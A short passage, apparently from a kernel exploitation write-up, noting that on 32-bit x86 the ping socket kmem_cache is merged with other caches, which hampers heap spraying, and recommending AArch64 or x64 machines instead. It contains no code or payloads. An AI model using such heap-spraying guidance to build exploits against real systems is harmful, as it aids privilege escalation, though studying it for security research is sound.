In addition, if you want to simplify the experiment through a standard x86 machine, be careful. During my exploration, I found that in 32-bit architecture, the kmem_cache
for ping sock will be integrated into others, which leads to big trouble of heap spraying. The AArch64 or x64 machine is preferable.